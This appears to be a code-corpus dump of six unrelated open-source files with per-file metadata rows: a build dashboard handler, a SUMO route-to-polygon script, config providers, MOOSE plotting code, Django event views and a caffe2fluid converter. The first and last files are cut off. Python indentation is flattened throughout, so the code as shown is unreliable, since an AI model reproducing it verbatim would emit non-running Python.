# last.num's number instead (last is likely not rooted).
q = Commit.all()
q.order('-__key__')
q.ancestor(root)
last = q.fetch(1)[0]
num = last.num+1
n = Commit(key_name = '%08x-%s' % (num, node), parent = root)
n.num = num
n.node = node
n.parentnode = parenthash
n.user = user
n.date = date
n.desc = desc
n.put()
db.run_in_transaction(add_commit)
n = nodeByHash(node)
if n is None:
return self.json({'Status': 'FAIL', 'Error': 'failed to create commit node'})
return self.json({'Status': 'OK', 'Node': nodeObj(n)})
# Build serves /build.
# A POST to /build records a new build result.
class Build(webapp.RequestHandler):
def post(self):
if not auth(self.request):
self.response.set_status(403)
return
builder = self.request.get('builder')
log = self.request.get('log').encode('utf-8')
loghash = ''
if len(log) > 0:
loghash = hashlib.sha256(log).hexdigest()
l = CompressedLog(key_name=loghash)
l.log = bz2.compress(log)
l.put()
node = self.request.get('node')
if not validNode(node):
logging.error('Invalid node %s' % (node))
self.response.set_status(500)
return
n = nodeByHash(node)
if n is None:
logging.error('Cannot find node %s' % (node))
self.response.set_status(404)
return
nn = n
def add_build():
n = nodeByHash(node, ancestor=nn)
if n is None:
logging.error('Cannot find hash in add_build: %s %s' % (builder, node))
return
s = '%s`%s' % (builder, loghash)
for i, b in enumerate(n.builds):
if b.split('`', 1)[0] == builder:
# logging.error('Found result for %s %s already' % (builder, node))
n.builds[i] = s
break
else:
# logging.error('Added result for %s %s' % (builder, node))
n.builds.append(s)
n.put()
db.run_in_transaction(add_build)
key = 'todo-%s' % builder
memcache.delete(key)
c = getBrokenCommit(node, builder)
if c is not None and not c.fail_notification_sent:
notifyBroken(c, builder)
self.response.set_status(200)
def getBrokenCommit(node, builder):
"""
getBrokenCommit returns a Commit that breaks the build.
The Commit will be either the one specified by node or the one after.
"""
# Squelch mail if already fixed.
head = firstResult(builder)
if broken(head, builder) == False:
return
# Get current node and node before, after.
cur = nodeByHash(node)
if cur is None:
return
before = nodeBefore(cur)
after = nodeAfter(cur)
if broken(before, builder) == False and broken(cur, builder):
return cur
if broken(cur, builder) == False and broken(after, builder):
return after
return
def firstResult(builder):
q = Commit.all().order('-__key__')
for c in q.fetch(20):
for i, b in enumerate(c.builds):
p = b.split('`', 1)
if p[0] == builder:
return c
return None
def nodeBefore(c):
return nodeByHash(c.parentnode)
def nodeAfter(c):
return Commit.all().filter('parenthash', c.node).get()
def notifyBroken(c, builder):
def send():
n = Commit.get(c.key())
if n is None:
logging.error("couldn't retrieve Commit '%s'" % c.key())
return False
if n.fail_notification_sent:
return False
n.fail_notification_sent = True
return n.put()
if not db.run_in_transaction(send):
return
subject = const.mail_fail_subject % (builder, c.desc.split('\n')[0])
path = os.path.join(os.path.dirname(__file__), 'fail-notify.txt')
body = template.render(path, {
"builder": builder,
"node": c.node,
"user": c.user,
"desc": c.desc,
"loghash": logHash(c, builder)
})
mail.send_mail(
sender=const.mail_from,
to=const.mail_fail_to,
subject=subject,
body=body
)
def logHash(c, builder):
for i, b in enumerate(c.builds):
p = b.split('`', 1)
if p[0] == builder:
return p[1]
return ""
def broken(c, builder):
"""
broken returns True if commit c breaks the build for the specified builder,
False if it is a good build, and None if no results exist for this builder.
"""
if c is None:
return None
for i, b in enumerate(c.builds):
p = b.split('`', 1)
if p[0] == builder:
return len(p[1]) > 0
return None
def node(num):
q = Commit.all()
q.filter('num =', num)
n = q.get()
return n
def nodeByHash(hash, ancestor=None):
q = Commit.all()
q.filter('node =', hash)
if ancestor is not None:
q.ancestor(ancestor)
n = q.get()
return n
# nodeObj returns a JSON object (ready to be passed to simplejson.dump) describing node.
def nodeObj(n):
return {
'Hash': n.node,
'ParentHash': n.parentnode,
'User': n.user,
'Date': n.date.strftime('%Y-%m-%d %H:%M %z'),
'Desc': n.desc,
}
class FixedOffset(datetime.tzinfo):
"""Fixed offset in minutes east from UTC."""
def __init__(self, offset):
self.__offset = datetime.timedelta(seconds = offset)
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return None
def dst(self, dt):
return datetime.timedelta(0)
def validNode(node):
if len(node) != 40:
return False
for x in node:
o = ord(x)
if (o < ord('0') or o > ord('9')) and (o < ord('a') or o > ord('f')):
return False
return True
def parseDate(date):
if '-' in date:
(a, offset) = date.split('-', 1)
try:
return datetime.datetime.fromtimestamp(float(a), FixedOffset(0-int(offset)))
except ValueError:
return None
if '+' in date:
(a, offset) = date.split('+', 1)
try:
return datetime.datetime.fromtimestamp(float(a), FixedOffset(int(offset)))
except ValueError:
return None
try:
return datetime.datetime.utcfromtimestamp(float(date))
except ValueError:
return None
email_re = re.compile('^[^<]+<([^>]*)>$')
def toUsername(user):
r = email_re.match(user)
if r is None:
return user
email = r.groups()[0]
return email.replace('@golang.org', '')
def dateToShortStr(d):
return d.strftime('%a %b %d %H:%M')
def parseBuild(build):
[builder, logblob] = build.split('`')
return {'builder': builder, 'log': logblob, 'ok': len(logblob) == 0}
def nodeInfo(c):
return {
"node": c.node,
"user": toUsername(c.user),
"date": dateToShortStr(c.date),
"desc": c.desc,
"shortdesc": c.desc.split('\n', 2)[0]
}
def toRev(c):
b = nodeInfo(c)
b['builds'] = [parseBuild(build) for build in c.builds]
return b
def byBuilder(x, y):
return cmp(x['builder'], y['builder'])
# Give old builders work; otherwise they pound on the web site.
class Hwget(DashboardHandler):
def get(self):
self.response.out.write("8000\n")
# This is the URL map for the server. The first three entries are public, the
# rest are only used by the builders.
application = webapp.WSGIApplication(
[('/', MainPage),
('/hw-get', Hwget),
('/log/.*', LogHandler),
('/commit', CommitHandler),
('/init', Init),
('/todo', Todo),
('/build', Build),
], debug=True)
def main():
run_wsgi_app(application)
if __name__ == "__main__":
main()
| bsd-3-clause | 3,911,460,761,777,126,000 | 30.888889 | 108 | 0.570754 | false |
cathyyul/sumo-0.18 | tools/route/route2poly.py | 2 | 2792 | #!/usr/bin/env python
"""
@file route2poly.py
@author Jakob Erdmann
@date 2012-11-15
@version $Id: route2poly.py 14425 2013-08-16 20:11:47Z behrisch $
From a sumo network and a route file, this script generates a polygon (polyline) for every route
which can be loaded with sumo-gui for visualization
SUMO, Simulation of Urban MObility; see http://sumo-sim.org/
Copyright (C) 2007-2013 DLR (http://www.dlr.de/) and contributors
All rights reserved
"""
import sys
import os
import colorsys
import itertools
from random import random
from optparse import OptionParser
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from sumolib.output import parse
from sumolib.net import readNet
def parse_args():
USAGE = "Usage: " + sys.argv[0] + " <netfile> <routefile> [options]"
optParser = OptionParser()
optParser.add_option("-o", "--outfile", help="name of output file")
optParser.add_option("-u", "--hue", default="random", help="hue for polygons (float from [0,1] or 'random')")
optParser.add_option("-s", "--saturation", default=1, help="saturation for polygons (float from [0,1] or 'random')")
optParser.add_option("-b", "--brightness", default=1, help="brightness for polygons (float from [0,1] or 'random')")
optParser.add_option("-l", "--layer", default=100, help="layer for generated polygons")
options, args = optParser.parse_args()
try:
options.net, options.routefile = args
options.colorgen = Colorgen((options.hue, options.saturation, options.brightness))
except:
sys.exit(USAGE)
if options.outfile is None:
options.outfile = options.routefile + ".poly.xml"
return options
class Colorgen:
def __init__(self, hsv):
self.hsv = hsv
def get_value(self, opt):
if opt == 'random':
return random()
else:
return float(opt)
def __call__(self):
"""return constant or randomized rgb-color string"""
return ','.join(map(str, colorsys.hsv_to_rgb(*map(self.get_value, self.hsv))))
def generate_poly(net, id, color, layer, edges, outf):
shape = list(itertools.chain(*list(net.getEdge(e).getShape() for e in edges)))
shapeString = ' '.join('%s,%s' % (x,y) for x,y in shape)
outf.write('<poly id="%s" color="%s" layer="%s" type="route" shape="%s"/>\n' % (
id, color, layer, shapeString))
def main():
options = parse_args()
net = readNet(options.net)
with open(options.outfile, 'w') as outf:
outf.write('<polygons>\n')
for vehicle in parse(options.routefile, 'vehicle'):
generate_poly(net, vehicle.id, options.colorgen(), options.layer, vehicle.route[0].edges.split(), outf)
outf.write('</polygons>\n')
if __name__ == "__main__":
main()
| gpl-3.0 | -629,852,987,685,948,400 | 36.226667 | 120 | 0.64649 | false |
GaretJax/coolfig | coolfig/providers.py | 1 | 2341 | import errno
import os
from functools import partial
NOT_PROVIDED = object()
class ConfigurationProvider(object):
def get(self, key):
raise NotImplementedError()
def iterprefixed(self, prefix):
raise NotImplementedError()
class DictConfig(ConfigurationProvider):
"""
Loads configuration values from the passed dictionary.
"""
def __init__(self, conf_dict, prefix=""):
self._conf_dict = conf_dict
self._prefix = prefix
def get(self, key):
try:
return self._conf_dict[self._prefix + key]
except KeyError:
return NOT_PROVIDED
def iterprefixed(self, prefix):
prefix = self._prefix + prefix
for k in self._conf_dict:
if k.startswith(prefix):
yield (k[len(self._prefix) :], self._conf_dict[k])
class EnvDirConfig(ConfigurationProvider):
def __init__(self, base_path, prefix=""):
self._base_path = base_path
self._prefix = prefix
def get(self, key):
path = os.path.join(self._base_path, key)
try:
with open(path) as fh:
return fh.read()
except IOError as e:
if e.errno == errno.EACCES: # Wrong permissions
raise
return NOT_PROVIDED # File does not exist
def iterprefixed(self, prefix):
prefix = self._prefix + prefix
if os.path.exists(self._base_path):
for k in os.listdir(self._base_path):
path = os.path.join(self._base_path, k)
if k.startswith(prefix) and os.path.isfile(path):
yield (k[len(self._prefix) :], self.get(k))
class FallbackProvider(ConfigurationProvider):
def __init__(self, providers):
self._providers = list(providers)
def get(self, key):
for provider in self._providers:
value = provider.get(key)
if value is not NOT_PROVIDED:
break
else:
value = NOT_PROVIDED
return value
def iterprefixed(self, prefix):
seen = set()
for provider in self._providers:
for k, v in provider.iterprefixed(prefix):
if k not in seen:
seen.add(k)
yield k, v
EnvConfig = partial(DictConfig, os.environ)
| mit | -3,658,767,841,437,671,000 | 26.541176 | 66 | 0.567706 | false |
harterj/moose | modules/porous_flow/doc/content/modules/porous_flow/tests/fluidstate/fluidstate.py | 12 | 5385 | #!/usr/bin/env python3
#* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
import matplotlib.pyplot as plt
import numpy as np
#
# The similarity solution (r^2/t) is applicable even when dissolution is included
#
# Read MOOSE simulation data for constant time (tdata) and constant
# radial distance (rdata) using the water-ncg fluid state
tdata = np.genfromtxt('../../../../../../test/tests/fluidstate/gold/theis_tabulated_csvout_line_0010.csv', delimiter = ',', names = True, dtype = float)
rdata = np.genfromtxt('../../../../../../test/tests/fluidstate/gold/theis_tabulated_csvout.csv', delimiter = ',', names = True, dtype = float)
# Distance where data is sampled as a function of time
r = 1
# Time where data is sampled along the spatial dimension
t = 8e2
plt.figure(0)
fig, axes = plt.subplots(1, 2, figsize = (15, 4))
# Gas pressure vs similarity solution
axes[0].plot(tdata['x']**2 / t, tdata['pgas'] * 1e-6, label = 'Fixed $t$')
axes[0].plot(r**2 / rdata['time'], rdata['pgas'] * 1e-6, 'o', label = 'Fixed $r$')
axes[0].set_xscale('log')
#axes[0].set_xlim([1e-4, 5e1])
axes[0].set_xlabel('$\zeta = r^2/t$')
axes[0].set_ylabel('Gas pressure (MPa)')
axes[0].legend()
# Total mass fraction vs similarity solution
axes[1].plot(tdata['x']**2 / t, tdata['zi'], label = 'Fixed $t$')
axes[1].plot(r**2 / rdata['time'], rdata['zi'], 'o', label = 'Fixed $r$')
axes[1].set_xscale('log')
#axes[1].set_xlim([1e-4, 5e1])
#axes[1].set_ylim([-0.1, 1.1])
axes[1].set_xlabel('$\zeta = r^2/t$')
axes[1].set_ylabel('Total mass fraction (-)')
axes[1].legend()
plt.tight_layout()
plt.savefig("theis_similarity_waterncg_fig.png")
plt.figure(1)
fig, axes = plt.subplots(1, 2, figsize = (15, 4))
# Gas saturation vs similarity solution
axes[0].plot(tdata['x']**2 / t, tdata['saturation_gas'] * 1e-6, label = 'Fixed $t$')
axes[0].plot(r**2 / rdata['time'], rdata['sgas'] * 1e-6, 'o', label = 'Fixed $r$')
axes[0].set_xscale('log')
#axes[0].set_xlim([1e-4, 5e1])
axes[0].set_xlabel('$\zeta = r^2/t$')
axes[0].set_ylabel('Gas saturation')
axes[0].legend()
# Dissolved gas mass fraction vs similarity solution
axes[1].plot(tdata['x']**2 / t, tdata['x1'], label = 'Fixed $t$')
axes[1].plot(r**2 / rdata['time'], rdata['x1'], 'o', label = 'Fixed $r$')
axes[1].set_xscale('log')
#axes[1].set_xlim([1e-4, 5e1])
#axes[1].set_ylim([-0.1, 1.1])
axes[1].set_xlabel('$\zeta = r^2/t$')
axes[1].set_ylabel('Total mass fraction (-)')
axes[1].legend()
plt.tight_layout()
plt.savefig("theis_similarity_waterncg_fig2.png")
#
# Read MOOSE simulation data for constant time (tdata) and constant
# radial distance (rdata) using the brine-co2 fluid state
tdata = np.genfromtxt('../../../../../../test/tests/fluidstate/gold/theis_brineco2_csvout_line_0028.csv', delimiter = ',', names = True, dtype = float)
rdata = np.genfromtxt('../../../../../../test/tests/fluidstate/gold/theis_brineco2_csvout.csv', delimiter = ',', names = True, dtype = float)
# Distance where data is sampled as a function of time
r = 4
# Time where data is sampled along the spatial dimension
t = 1e5
plt.figure(2)
fig, axes = plt.subplots(3, 1, figsize = (8, 8))
# Gas pressure vs similarity solution
axes[0].plot(tdata['x']**2 / t, tdata['pgas'] * 1e-6, label = 'Fixed $t$')
axes[0].plot(r**2 / rdata['time'], rdata['pgas'] * 1e-6, 'o', label = 'Fixed $r$')
axes[0].set_xscale('log')
axes[0].set_xlim([1e-4, 2e1])
axes[0].set_xlabel('$\zeta = r^2/t$')
axes[0].set_ylabel('Gas pressure (MPa)')
axes[0].legend()
# Total mass fraction vs similarity solution
axes[1].plot(tdata['x']**2 / t, tdata['zi'], label = 'Fixed $t$')
axes[1].plot(r**2 / rdata['time'], rdata['zi'], 'o', label = 'Fixed $r$')
axes[1].set_xscale('log')
axes[1].set_xlim([1e-4, 2e1])
axes[1].set_ylim([-0.1, 1.1])
axes[1].set_xlabel('$\zeta = r^2/t$')
axes[1].set_ylabel('Total CO$_2$ mass fraction (-)')
axes[1].legend()
# NaCl mass fraction vs similarity solution
axes[2].plot(tdata['x']**2 / t, tdata['xnacl'], label = 'Fixed $t$')
axes[2].plot(r**2 / rdata['time'], rdata['xnacl'], 'o', label = 'Fixed $r$')
axes[2].set_xscale('log')
axes[2].set_xlim([1e-4, 2e1])
axes[2].set_ylim([0.09, 0.11])
axes[2].set_xlabel('$\zeta = r^2/t$')
axes[2].set_ylabel('NaCl mass fraction (-)')
axes[2].legend()
plt.tight_layout()
plt.savefig("theis_similarity_brineco2_fig.png")
plt.figure(3)
fig, axes = plt.subplots(2, 1, figsize = (8, 8))
# Gas saturation vs similarity solution
axes[0].plot(tdata['x']**2 / t, tdata['saturation_gas'] * 1e-6, label = 'Fixed $t$')
axes[0].plot(r**2 / rdata['time'], rdata['sgas'] * 1e-6, 'o', label = 'Fixed $r$')
axes[0].set_xscale('log')
axes[0].set_xlim([1e-4, 2e1])
axes[0].set_xlabel('$\zeta = r^2/t$')
axes[0].set_ylabel('Gas pressure (MPa)')
axes[0].legend()
# Dissolved gas mass fraction vs similarity solution
axes[1].plot(tdata['x']**2 / t, tdata['x1'], label = 'Fixed $t$')
axes[1].plot(r**2 / rdata['time'], rdata['x1'], 'o', label = 'Fixed $r$')
axes[1].set_xscale('log')
axes[1].set_xlim([1e-4, 2e1])
axes[1].set_xlabel('$\zeta = r^2/t$')
axes[1].set_ylabel('Total CO$_2$ mass fraction (-)')
axes[1].legend()
plt.tight_layout()
plt.savefig("theis_similarity_brineco2_fig2.png")
| lgpl-2.1 | -285,013,033,532,436,960 | 39.488722 | 152 | 0.647354 | false |
ercchy/coding-events | web/views/events.py | 1 | 11422 | from django.contrib.gis.geoip import GeoIPException
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.template import loader
from django.template import Context
from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.core import serializers
from django.core.urlresolvers import reverse
from django_countries import countries
from api.processors import get_event_by_id
from api.processors import get_filtered_events
from api.processors import get_approved_events
from api.processors import get_pending_events
from api.processors import get_created_events
from api.processors import get_next_or_previous
from api.processors import get_nearby_events
from web.forms.event_form import AddEventForm
from web.forms.event_form import SearchEventForm
from web.processors.event import get_initial_data
from web.processors.event import change_event_status
from web.processors.event import reject_event_status
from web.processors.event import create_or_update_event
from web.processors.user import update_user_email
from web.processors.user import get_ambassadors
from web.processors.event import get_client_ip
from web.processors.event import get_lat_lon_from_user_ip
from web.processors.event import list_countries, list_active_countries
from web.processors.event import get_country
from web.processors.event import get_country_from_user_ip
from web.processors.event import count_approved_events_for_country
from web.processors.media import process_image
from web.processors.media import ImageSizeTooLargeException
from web.processors.media import UploadImageError
from web.decorators.events import can_edit_event
from web.decorators.events import can_moderate_event
from web.decorators.events import is_ambassador
from django.http import Http404
from django.shortcuts import redirect
from django.core.exceptions import ObjectDoesNotExist
"""
Do not Query the database directly from te view.
Use a processors file within the api app, put all of your queries there and
then call your newly created function in view!!! .-Erika
"""
def index(request):
template = 'pages/index.html'
past = request.GET.get('past', 'no')
user_ip = get_client_ip(forwarded=request.META.get('HTTP_X_FORWARDED_FOR'),
remote=request.META.get('REMOTE_ADDR'))
country = get_country_from_user_ip(user_ip)
try:
lan_lon = get_lat_lon_from_user_ip(user_ip) or (58.08695, 5.58121)
except GeoIPException:
lan_lon = (58.08695, 5.58121)
ambassadors = get_ambassadors(country['country_code'])
all_countries = list_active_countries()
return render_to_response(
template, {
'lan_lon': lan_lon,
'country': country,
# all_countries minus two CUSTOM_COUNTRY_ENTRIES
'all_countries': all_countries,
'past': past,
'ambassadors': ambassadors,
},
context_instance=RequestContext(request))
def map(request):
template = 'pages/map.html'
past = request.GET.get('past', 'no')
user_ip = get_client_ip(forwarded=request.META.get('HTTP_X_FORWARDED_FOR'),
remote=request.META.get('REMOTE_ADDR'))
country = get_country_from_user_ip(user_ip)
try:
lan_lon = get_lat_lon_from_user_ip(user_ip) or (58.08695, 5.58121)
except GeoIPException:
lan_lon = (58.08695, 5.58121)
ambassadors = get_ambassadors(country['country_code'])
all_countries = list_countries()
return render_to_response(
template, {
'lan_lon': lan_lon,
'country': country,
# all_countries minus two CUSTOM_COUNTRY_ENTRIES
'all_countries': all_countries[2:],
'past': past,
'ambassadors': ambassadors,
},
context_instance=RequestContext(request))
@login_required
def add_event(request):
if request.method == 'POST':
event_form = AddEventForm(data=request.POST, files=request.FILES)
if event_form.is_valid():
picture = request.FILES.get('picture', None)
event_data = {}
try:
if picture:
if picture.size > (256 * 1024):
raise ImageSizeTooLargeException('Image size too large.')
event_data['picture'] = process_image(picture)
event_data.update(event_form.cleaned_data)
event_data['creator'] = request.user
# checking if user entered a different email than in her profile
if request.user.email != event_data['user_email']:
update_user_email(request.user.id, event_data['user_email'])
event_data.pop('user_email')
event = create_or_update_event(**event_data)
t = loader.get_template('alerts/thank_you.html')
c = Context({'event': event, })
messages.info(request, t.render(c))
return HttpResponseRedirect(reverse('web.view_event', args=[event.pk, event.slug]))
except ImageSizeTooLargeException:
messages.error(request, 'The image is just a bit too big for us. '
'Please reduce your image size and try agin.')
except UploadImageError as e:
messages.error(request, e.message)
else:
event_form = AddEventForm(initial={'user_email': request.user.email})
return render_to_response("pages/add_event.html", {
'form': event_form,
}, context_instance=RequestContext(request))
@login_required
@can_edit_event
def edit_event(request, event_id):
event = get_event_by_id(event_id)
user = request.user
initial = get_initial_data(event)
initial['user_email'] = request.user.email
event_data = {}
if request.method == 'POST':
event_form = AddEventForm(data=request.POST, files=request.FILES)
else:
event_form = AddEventForm(initial=initial)
existing_picture = event.picture
if event_form.is_valid():
# picture_check works with jasny bootstrap magix
picture_check = request.POST.get('picture')
picture = request.FILES.get('picture', None)
event_data = event_form.cleaned_data
event_data['creator'] = request.user
# checking if user entered a different email than in her profile
if user.email != event_data['user_email']:
update_user_email(user.id, event_data['user_email'])
event_data.pop('user_email')
try:
if picture:
if picture.size > (256 * 1024):
raise ImageSizeTooLargeException('Image size too large.')
event_data['picture'] = process_image(picture)
elif picture_check == "nochange":
event_data['picture'] = existing_picture
else:
del event_data['picture']
create_or_update_event(event_id, **event_data)
return HttpResponseRedirect(reverse('web.view_event',
kwargs={'event_id': event.id, 'slug': event.slug}))
except ImageSizeTooLargeException:
messages.error(request, 'The image is just a bit too big for us (must be up to 256 kb). '
'Please reduce your image size and try agin.')
except UploadImageError as e:
messages.error(request, e.message)
return render_to_response(
'pages/add_event.html', {
'form': event_form,
'address': event_data.get('location', None),
'editing': True,
'picture_url': event.picture,
}, context_instance=RequestContext(request))
def view_event_by_country(request, country_code):
event_list = get_approved_events(country_code=country_code)
return render_to_response(
'pages/list_events.html', {
'event_list': event_list,
'country_code': country_code,
}, context_instance=RequestContext(request))
def view_event(request, event_id, slug):
try:
event = get_event_by_id(event_id)
except ObjectDoesNotExist as e:
raise Http404
next_event = get_next_or_previous(event, country_code=event.country)
nearby = get_nearby_events(event, limit=4)
return render_to_response(
'pages/view_event.html', {
'event': event,
'next_event': next_event,
'nearby': nearby
}, context_instance=RequestContext(request))
def view_event_by_id(request, event_id):
try:
event = get_event_by_id(event_id)
except ObjectDoesNotExist as e:
raise Http404
return redirect(view_event, event_id, event.slug)
@login_required
@is_ambassador
def list_pending_events(request, country_code):
"""
Display a list of pending events.
"""
active_page = request.GET.get('page','')
if request.user.is_staff:
event_list = get_pending_events(past=True)
event_list = sorted(event_list, key=lambda a: a.country.code)
else:
event_list = get_pending_events(country_code=country_code, past=True)
country_name = unicode(dict(countries)[country_code])
return render_to_response(
'pages/list_events.html', {
'event_list': event_list,
'status': 'pending',
'country_code': country_code,
'country_name': country_name,
'active_page': active_page
}, context_instance=RequestContext(request))
@login_required
@is_ambassador
def list_approved_events(request, country_code):
"""
Display a list of approved events.
"""
event_list = get_approved_events(country_code=country_code, past=True)
country_name = unicode(dict(countries)[country_code])
return render_to_response('pages/list_events.html', {
'event_list': event_list,
'status': 'approved',
'country_code': country_code,
'country_name': country_name
}, context_instance=RequestContext(request))
@login_required
def created_events(request):
"""
Display a list of pending events.
"""
creator = request.user
event_list = get_created_events(creator=creator, past=True)
return render_to_response(
'pages/list_user_events.html', {
'event_list': event_list,
}, context_instance=RequestContext(request))
def search_events(request):
country_code = request.GET.get('country_code', None)
if not country_code:
country_code = request.GET.get('country', None)
if not country_code:
user_ip = get_client_ip(forwarded=request.META.get('HTTP_X_FORWARDED_FOR'),
remote=request.META.get('REMOTE_ADDR'))
country = get_country(country_code, user_ip)
country_code = country['country_code']
past = request.GET.get('past', 'no')
past_events = False
if past == 'yes':
past_events = True
search_query = request.GET.get('q', '')
page = request.GET.get('page', None)
theme_filter = request.GET.get('theme', None)
audience_filter = request.GET.get('audience', None)
template = 'pages/search_events.html'
page_template = 'pages/ajax_faceted_search_events.html'
form = SearchEventForm(country_code=country_code, past_events=past, search=search_query)
events = get_filtered_events(search_query, country_code, theme_filter,audience_filter, past_events)
if request.is_ajax():
return render_to_response(
page_template,
{
'events':events,
'page': page
},
context_instance=RequestContext(request))
return render_to_response(
template,
{
'page_template': page_template,
'events': events,
'form': form,
'country': country_code,
},
context_instance=RequestContext(request))
def scoreboard(request):
template = 'pages/scoreboard.html'
counts = count_approved_events_for_country()
return render_to_response(
template, {
'counts': counts,
},
context_instance=RequestContext(request))
@login_required
@can_moderate_event
def change_status(request, event_id):
event = change_event_status(event_id)
return HttpResponseRedirect(reverse('web.view_event', args=[event_id, event.slug]))
@login_required
@can_moderate_event
def reject_status(request, event_id):
event = reject_event_status(event_id)
return HttpResponseRedirect(reverse('web.view_event', args=[event_id, event.slug]))
| mit | 4,533,266,203,250,255,400 | 28.979003 | 101 | 0.717913 | false |
kuke/models | fluid/PaddleCV/caffe2fluid/kaffe/paddle/transformer.py | 1 | 13679 | import numpy as np
from ..errors import KaffeError, print_stderr
from ..graph import GraphBuilder, NodeMapper
from ..layers import NodeKind
from ..transformers import (DataInjector, DataReshaper, NodeRenamer,
SubNodeFuser, ReLUFuser, BatchNormScaleBiasFuser,
BatchNormPreprocessor, ParameterNamer, CropFuser)
from . import network
class PaddleNode(object):
'''An intermediate representation for Paddle operations.'''
def __init__(self, op, *args, **kwargs):
# A string corresponding to the Paddle operation
self.op = op
# Positional arguments for the operation
self.args = args
# Keyword arguments for the operation
self.kwargs = list(kwargs.items())
# The source Caffe node
self.node = None
def format(self, arg):
'''Returns a string representation for the given value.'''
return "'%s'" % arg if isinstance(arg, basestring) else str(arg)
def pair(self, key, value):
'''Returns key=formatted(value).'''
return '%s=%s' % (key, self.format(value))
def emit(self):
'''Emits the Python source for this node.'''
# Format positional arguments
args = map(self.format, self.args)
# Format any keyword arguments
if self.kwargs:
args += [self.pair(k, v) for k, v in self.kwargs]
# Set the node name
args.append(self.pair('name', self.node.name))
args = ', '.join(args)
return '%s(%s)' % (self.op, args)
class MaybeActivated(object):
def __init__(self, node, default=True):
self.inject_kwargs = {}
if node.metadata.get('relu', False) != default:
self.inject_kwargs['relu'] = not default
default_slope = 0.0
slope = node.metadata.get('relu_negative_slope', default_slope)
if slope != default_slope:
self.inject_kwargs['relu_negative_slope'] = slope
def __call__(self, *args, **kwargs):
kwargs.update(self.inject_kwargs)
return PaddleNode(*args, **kwargs)
class PaddleMapper(NodeMapper):
def get_kernel_params(self, node):
kernel_params = node.layer.kernel_parameters
input_shape = node.get_only_parent().output_shape
padding = [kernel_params.pad_h, kernel_params.pad_w]
if padding[0] == 0 and padding[1] == 0:
padding = {}
else:
padding = {'padding': padding}
return (kernel_params, padding)
def map_convolution(self, node):
(kernel_params, kwargs) = self.get_kernel_params(node)
h = kernel_params.kernel_h
w = kernel_params.kernel_w
c_o = node.output_shape[1]
c_i = node.parents[0].output_shape[1]
group = node.parameters.group
if group != 1:
kwargs['group'] = group
if not node.parameters.bias_term:
kwargs['biased'] = False
if kernel_params.dila_h != 1 or kernel_params.dila_w != 1:
kwargs['dilation'] = (kernel_params.dila_h, kernel_params.dila_w)
assert kernel_params.kernel_h == h
assert kernel_params.kernel_w == w
return MaybeActivated(node)(
'conv', kernel_params.kernel_h, kernel_params.kernel_w, c_o,
kernel_params.stride_h, kernel_params.stride_w, **kwargs)
def map_deconvolution(self, node):
(kernel_params, kwargs) = self.get_kernel_params(node)
h = kernel_params.kernel_h
w = kernel_params.kernel_w
c_o = node.output_shape[1]
c_i = node.parents[0].output_shape[1]
if not node.parameters.bias_term:
kwargs['biased'] = False
if kernel_params.dila_h != 1 or kernel_params.dila_w != 1:
kwargs['dilation'] = (kernel_params.dila_h, kernel_params.dila_w)
assert kernel_params.kernel_h == h
assert kernel_params.kernel_w == w
return MaybeActivated(node)(
'deconv', kernel_params.kernel_h, kernel_params.kernel_w, c_o,
kernel_params.stride_h, kernel_params.stride_w, **kwargs)
def map_relu(self, node):
return PaddleNode('relu')
def map_prelu(self, node):
channel_shared = getattr(node.parameters, 'channel_shared', False)
return PaddleNode('prelu', channel_shared)
def map_tanh(self, node):
return PaddleNode('tanh')
def map_pooling(self, node):
pool_type = node.parameters.pool
if pool_type == 0:
pool_op = 'max_pool'
elif pool_type == 1:
pool_op = 'avg_pool'
else:
# Stochastic pooling, for instance.
raise KaffeError('Unsupported pooling type.')
ceil_mode = getattr(node.layer.parameters, 'ceil_mode', True)
global_pool = getattr(node.layer.parameters, 'global_pooling', False)
if global_pool:
input_shape = node.get_only_parent().output_shape
return PaddleNode(pool_op, input_shape.height, input_shape.width, 1,
1, ceil_mode)
else:
(kernel_params, padding) = self.get_kernel_params(node)
return PaddleNode(pool_op, kernel_params.kernel_h,
kernel_params.kernel_w, kernel_params.stride_h,
kernel_params.stride_w, ceil_mode, **padding)
def map_sigmoid(self, node):
return PaddleNode('sigmoid')
def map_custom(self, node):
from .. import custom_layers
return custom_layers.make_node(PaddleNode, node.kind, node)
def map_inner_product(self, node):
#TODO: Axis
assert node.parameters.axis == 1
#TODO: Unbiased
assert node.parameters.bias_term == True
return MaybeActivated(node)('fc', node.parameters.num_output)
def map_softmax(self, node):
return PaddleNode('softmax', node.parameters.axis)
def map_lrn(self, node):
params = node.parameters
# The window size must be an odd value. For a window
# size of (2*n+1), Paddle defines depth_radius = n.
assert params.local_size % 2 == 1
# Caffe scales by (alpha/(2*n+1)), whereas Paddle
# just scales by alpha (as does Krizhevsky's paper).
# We'll account for that here.
alpha = params.alpha / float(params.local_size)
return PaddleNode('lrn', params.local_size, alpha, params.beta)
def map_concat(self, node):
return PaddleNode('concat', node.parameters.axis)
def map_dropout(self, node):
return PaddleNode('dropout', node.parameters.dropout_ratio)
def map_batch_norm(self, node):
scale_offset = len(node.data) == 4
#this default value comes from caffe's param in batch_norm
default_eps = 1e-5
kwargs = {'scale_offset': scale_offset}
if node.parameters.eps != default_eps:
kwargs['eps'] = node.parameters.eps
return MaybeActivated(
node, default=False)('batch_normalization', **kwargs)
def map_eltwise(self, node):
operations = {0: 'multiply', 1: 'add', 2: 'max'}
op_code = node.parameters.operation
try:
return PaddleNode(operations[op_code])
except KeyError:
raise KaffeError('Unknown elementwise operation: {}'.format(
op_code))
def map_scale(self, node):
params = node.parameters
return PaddleNode('scale', axis=params.axis, num_axes=params.num_axes)
def commit(self, chains):
return chains
class PaddleEmitter(object):
def __init__(self, tab=None):
self.tab = tab or ' ' * 4
self.prefix = ''
self.net_name = ''
def indent(self):
self.prefix += self.tab
def outdent(self):
self.prefix = self.prefix[:-len(self.tab)]
def statement(self, s):
return self.prefix + s + '\n'
def emit_imports(self):
import inspect
codes = []
codes.append(
'### generated by caffe2fluid, your net is in class "%s" ###\n' %
(self.net_name))
network_source = inspect.getsource(network)
codes.append(network_source + '\n')
